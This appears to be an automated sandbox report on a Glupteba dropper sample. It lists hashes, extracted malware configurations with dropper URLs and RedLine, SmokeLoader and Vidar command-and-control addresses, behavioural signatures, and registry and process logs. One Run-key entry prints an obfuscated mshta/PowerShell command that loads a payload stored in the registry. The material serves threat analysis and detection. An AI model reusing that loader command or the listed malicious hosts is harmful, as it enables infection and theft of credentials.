glupteba | 7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f

Analysis

max time kernel
152s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
10-03-2022 01:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe
Size

8.1MB
MD5

d6c430709fa8d77d5ab0ef01b4e9cac4
SHA1

eae21073e72da382a4f71d19a6e2347f170e5805
SHA256

7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f
SHA512

6c9c65653b4ebd83f71184f4eced9d17dffd2293fdd8189515f07b23880689095de9d72e8fcd1e1d9e50f1e34aa913180eca3bb6e3db14c9e76e975833bbb8b5

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

fdfsdf

86.107.197.196:63065

Attributes

auth_value
49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

Travis

5.182.5.22:33809

Attributes

auth_value
6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

redline

Botnet

jack

5.182.5.203:33873

Attributes

auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

vidar

Version

50.6

Botnet

937

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

ruzki (check bio)

103.133.111.182:44839

Attributes

auth_value
767fa45398d3ac4a23de20d0480c2b03

Extracted

Family

redline

Botnet

x$x

62.204.41.34:28567

Attributes

auth_value
674928c395f2a730060471843eb9604e

Extracted

Family

redline

Botnet

nusha

65.108.27.131:45256

Attributes

auth_value
1d7f942cf65dce68d206c152c3cd5a4a

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3940-173-0x0000000005200000-0x0000000005B26000-memory.dmp	family_glupteba
behavioral2/memory/3940-174-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/2024-186-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/1296-190-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4768 696 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	696	rUNdlL32.eXe

RedLine Payload 13 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\LQjiC6CxycVmKHIsx48t5juW.exe	family_redline
behavioral2/memory/2128-223-0x0000000000210000-0x0000000000230000-memory.dmp	family_redline
behavioral2/memory/5000-231-0x0000000000FC0000-0x00000000011E1000-memory.dmp	family_redline
behavioral2/memory/5000-246-0x0000000000FC0000-0x00000000011E1000-memory.dmp	family_redline
behavioral2/memory/5000-249-0x0000000000FC0000-0x00000000011E1000-memory.dmp	family_redline
behavioral2/memory/868-248-0x00000000001F0000-0x0000000000413000-memory.dmp	family_redline
behavioral2/memory/868-245-0x00000000001F0000-0x0000000000413000-memory.dmp	family_redline
behavioral2/memory/868-232-0x00000000001F0000-0x0000000000413000-memory.dmp	family_redline
behavioral2/memory/5000-265-0x0000000000FC0000-0x00000000011E1000-memory.dmp	family_redline
behavioral2/memory/3400-271-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\LQjiC6CxycVmKHIsx48t5juW.exe	family_redline
behavioral2/memory/1424-360-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4620-377-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\c1uWn36JMLTOIWNQ5QGAwvr6.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\c1uWn36JMLTOIWNQ5QGAwvr6.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 5020 created 3940 5020 svchost.exe Info.exe
PID 5020 created 1296 5020 svchost.exe csrss.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 5020 created 3940	5020	svchost.exe	Info.exe
PID 5020 created 1296	5020	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4768-269-0x0000000000760000-0x00000000007A4000-memory.dmp	family_onlylogger
behavioral2/memory/4768-272-0x0000000000400000-0x0000000000492000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4460-258-0x0000000000400000-0x0000000002EEE000-memory.dmp	family_vidar

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

246 4512 powershell.exe
247 4280 powershell.exe
250 2944 powershell.exe
258 4512 powershell.exe
Downloads MZ/PE file

flow	pid	process
246	4512	powershell.exe
247	4280	powershell.exe
250	2944	powershell.exe
258	4512	powershell.exe

Executes dropped EXE 41 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeInfo.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exeWerFault.exejfiag3g_gg.exejfiag3g_gg.exeInfo.execsrss.exeLczuHO94nruzebUDQHFXKqYb.exe9glrXkqH9i7GGQrFA3bkUmSJ.exe5YykviJ_Zodc46p_errdJids.exeatzvKx4nr6Q1vieUIFrIao5s.exeld_okjvwoT1yVDd8nHoegzoy.exeas4qJia1bHnLCDKj1Zg2H4yX.exec1uWn36JMLTOIWNQ5QGAwvr6.exeQsDVuuieOmEhcfjx2u5bd_qJ.exeLQjiC6CxycVmKHIsx48t5juW.exeWerFault.exeY26PeZoHoz5v8PcQ9YkXcXnl.exeHKLNUgv6BDkBQC4h_3RUAIdm.exegi27Ksb4YlbDxYWvkAR_a6UO.exeinjector.exekOwUUuEfZcj2CeXc627itgCA.exevk8VZZRPVzoDN0j8Eow_wmt2.exelfOURd4ic1TO6jCMzih2CvoQ.exe2au1U3Sxz66Uu70W74ARzLOm.exeA13J3utnAUpj4FYuLr1BNmPg.exeinjector.exe9B4KYHHZhCAUiQS4PWfpIftR.exeinjector.exeInstall.exeas4qJia1bHnLCDKj1Zg2H4yX.exeInstall.exeAccostarmi.exe.pifsfjwvrc

pid	process
3252	SoCleanInst.exe
2764	md9_1sjm.exe
1160	Folder.exe
3940	Info.exe
4140	Updbdate.exe
1432	Install.exe
4596	Files.exe
4300	pub2.exe
4344	File.exe
4860	WerFault.exe
4284	jfiag3g_gg.exe
1736	jfiag3g_gg.exe
2024	Info.exe
1296	csrss.exe
2104	LczuHO94nruzebUDQHFXKqYb.exe
4820	9glrXkqH9i7GGQrFA3bkUmSJ.exe
4460	5YykviJ_Zodc46p_errdJids.exe
3016	atzvKx4nr6Q1vieUIFrIao5s.exe
1036	ld_okjvwoT1yVDd8nHoegzoy.exe
3104	as4qJia1bHnLCDKj1Zg2H4yX.exe
3044	c1uWn36JMLTOIWNQ5QGAwvr6.exe
4768	QsDVuuieOmEhcfjx2u5bd_qJ.exe
2128	LQjiC6CxycVmKHIsx48t5juW.exe
4204	WerFault.exe
4168	Y26PeZoHoz5v8PcQ9YkXcXnl.exe
1492	HKLNUgv6BDkBQC4h_3RUAIdm.exe
1780	gi27Ksb4YlbDxYWvkAR_a6UO.exe
2632	injector.exe
4136	kOwUUuEfZcj2CeXc627itgCA.exe
4972	vk8VZZRPVzoDN0j8Eow_wmt2.exe
5000	lfOURd4ic1TO6jCMzih2CvoQ.exe
868	2au1U3Sxz66Uu70W74ARzLOm.exe
4148	A13J3utnAUpj4FYuLr1BNmPg.exe
964	injector.exe
5016	9B4KYHHZhCAUiQS4PWfpIftR.exe
2524	injector.exe
888	Install.exe
3400	as4qJia1bHnLCDKj1Zg2H4yX.exe
4452	Install.exe
5936	Accostarmi.exe.pif
4840	sfjwvrc

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\ld_okjvwoT1yVDd8nHoegzoy.exe	upx
C:\Users\Admin\Pictures\Adobe Films\ld_okjvwoT1yVDd8nHoegzoy.exe	upx
C:\Users\Admin\Pictures\Adobe Films\Ntmr4VurBkePcu0Frkf64dAA.exe	upx
C:\Users\Admin\Pictures\Adobe Films\Ntmr4VurBkePcu0Frkf64dAA.exe	upx
behavioral2/memory/5428-363-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral2/memory/5428-365-0x0000000000400000-0x0000000000446000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

A13J3utnAUpj4FYuLr1BNmPg.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	A13J3utnAUpj4FYuLr1BNmPg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	A13J3utnAUpj4FYuLr1BNmPg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exeFolder.exeFile.exeHKLNUgv6BDkBQC4h_3RUAIdm.exe5YykviJ_Zodc46p_errdJids.exeQsDVuuieOmEhcfjx2u5bd_qJ.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	HKLNUgv6BDkBQC4h_3RUAIdm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	5YykviJ_Zodc46p_errdJids.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	QsDVuuieOmEhcfjx2u5bd_qJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe

Loads dropped DLL 4 IoCs

Processes:

rundll32.exe5YykviJ_Zodc46p_errdJids.exeAccostarmi.exe.pif

pid process

212 rundll32.exe
4460 5YykviJ_Zodc46p_errdJids.exe
4460 5YykviJ_Zodc46p_errdJids.exe
5936 Accostarmi.exe.pif
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
212	rundll32.exe
4460	5YykviJ_Zodc46p_errdJids.exe
4460	5YykviJ_Zodc46p_errdJids.exe
5936	Accostarmi.exe.pif

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4148-254-0x00007FF70DDC0000-0x00007FF70E36E000-memory.dmp	themida
behavioral2/memory/4148-250-0x00007FF70DDC0000-0x00007FF70E36E000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exepowershell.exe9B4KYHHZhCAUiQS4PWfpIftR.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PurpleRiver = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eyxrppteq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mzpexsf\\Eyxrppteq.exe\""	9B4KYHHZhCAUiQS4PWfpIftR.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

A13J3utnAUpj4FYuLr1BNmPg.exemd9_1sjm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	A13J3utnAUpj4FYuLr1BNmPg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

101 ipinfo.io
104 api.db-ip.com
105 api.db-ip.com
204 ipinfo.io
208 api.db-ip.com
256 ipinfo.io
12 ip-api.com
100 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

lfOURd4ic1TO6jCMzih2CvoQ.exe2au1U3Sxz66Uu70W74ARzLOm.exe

pid process

5000 lfOURd4ic1TO6jCMzih2CvoQ.exe
868 2au1U3Sxz66Uu70W74ARzLOm.exe

flow	ioc
101	ipinfo.io
104	api.db-ip.com
105	api.db-ip.com
204	ipinfo.io
208	api.db-ip.com
256	ipinfo.io
12	ip-api.com
100	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
5000	lfOURd4ic1TO6jCMzih2CvoQ.exe
868	2au1U3Sxz66Uu70W74ARzLOm.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

as4qJia1bHnLCDKj1Zg2H4yX.exepowershell.exepowershell.exe9B4KYHHZhCAUiQS4PWfpIftR.exe

description	pid	process	target process
PID 3104 set thread context of 3400	3104	as4qJia1bHnLCDKj1Zg2H4yX.exe	as4qJia1bHnLCDKj1Zg2H4yX.exe
PID 2944 set thread context of 1424	2944	powershell.exe	RegSvcs.exe
PID 4280 set thread context of 5428	4280	powershell.exe	RegSvcs.exe
PID 5016 set thread context of 4620	5016	9B4KYHHZhCAUiQS4PWfpIftR.exe	MSBuild.exe

Drops file in Program Files directory 2 IoCs

Processes:

9glrXkqH9i7GGQrFA3bkUmSJ.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	9glrXkqH9i7GGQrFA3bkUmSJ.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	9glrXkqH9i7GGQrFA3bkUmSJ.exe

Drops file in Windows directory 3 IoCs

Processes:

Info.exeschtasks.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2552	212	WerFault.exe	rundll32.exe
4792	3940	WerFault.exe	Info.exe
3932	3940	WerFault.exe	Info.exe
4832	3940	WerFault.exe	Info.exe
2736	3940	WerFault.exe	Info.exe
2576	3940	WerFault.exe	Info.exe
3828	3940	WerFault.exe	Info.exe
4136	3940	WerFault.exe	Info.exe
5104	3940	WerFault.exe	Info.exe
3644	3940	WerFault.exe	Info.exe
4516	3940	WerFault.exe	Info.exe
4840	3940	WerFault.exe	Info.exe
1124	3940	WerFault.exe	Info.exe
4528	3940	WerFault.exe	Info.exe
3464	3940	WerFault.exe	Info.exe
4904	3940	WerFault.exe	Info.exe
4136	3940	WerFault.exe	Info.exe
4888	3940	WerFault.exe	Info.exe
3252	3940	WerFault.exe	Info.exe
4860	3940	WerFault.exe	Info.exe
4652	3940	WerFault.exe	Info.exe
1124	3940	WerFault.exe	Info.exe
2020	2024	WerFault.exe	Info.exe
3420	2024	WerFault.exe	Info.exe
5016	2024	WerFault.exe	Info.exe
1072	2024	WerFault.exe	Info.exe
1356	2024	WerFault.exe	Info.exe
4156	2024	WerFault.exe	Info.exe
4864	2024	WerFault.exe	Info.exe
4516	2024	WerFault.exe	Info.exe
4332	2024	WerFault.exe	Info.exe
3392	2024	WerFault.exe	Info.exe
1924	2024	WerFault.exe	Info.exe
4792	2024	WerFault.exe	Info.exe
4716	2024	WerFault.exe	Info.exe
4740	2024	WerFault.exe	Info.exe
2256	2024	WerFault.exe	Info.exe
3864	2024	WerFault.exe	Info.exe
312	1296	WerFault.exe	csrss.exe
3252	1296	WerFault.exe	csrss.exe
4120	1296	WerFault.exe	csrss.exe
4196	1296	WerFault.exe	csrss.exe
2348	1296	WerFault.exe	csrss.exe
3800	1296	WerFault.exe	csrss.exe
4608	1296	WerFault.exe	csrss.exe
3068	1296	WerFault.exe	csrss.exe
1224	1296	WerFault.exe	csrss.exe
3904	1296	WerFault.exe	csrss.exe
2268	1296	WerFault.exe	csrss.exe
2728	1296	WerFault.exe	csrss.exe
964	1296	WerFault.exe	csrss.exe
3720	1296	WerFault.exe	csrss.exe
4284	1296	WerFault.exe	csrss.exe
2076	1296	WerFault.exe	csrss.exe
3460	1296	WerFault.exe	csrss.exe
440	1296	WerFault.exe	csrss.exe
968	1296	WerFault.exe	csrss.exe
3392	1296	WerFault.exe	csrss.exe
2664	1296	WerFault.exe	csrss.exe
4744	1296	WerFault.exe	csrss.exe
4000	1296	WerFault.exe	csrss.exe
4740	1296	WerFault.exe	csrss.exe
2064	1296	WerFault.exe	csrss.exe
5060	3016	WerFault.exe	atzvKx4nr6Q1vieUIFrIao5s.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exesfjwvrc

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sfjwvrc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sfjwvrc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sfjwvrc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5YykviJ_Zodc46p_errdJids.exepowershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5YykviJ_Zodc46p_errdJids.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5YykviJ_Zodc46p_errdJids.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1876 schtasks.exe
4696 schtasks.exe
2268 schtasks.exe
4492 schtasks.exe
5004 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3976 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4744 tasklist.exe
5664 tasklist.exe

pid	process
1876	schtasks.exe
4696	schtasks.exe
2268	schtasks.exe
4492	schtasks.exe
5004	schtasks.exe

pid	process
3976	timeout.exe

pid	process
4744	tasklist.exe
5664	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

6012 taskkill.exe
4772 taskkill.exe
3512 taskkill.exe
5264 taskkill.exe

pid	process
6012	taskkill.exe
4772	taskkill.exe
3512	taskkill.exe
5264	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Info.exe
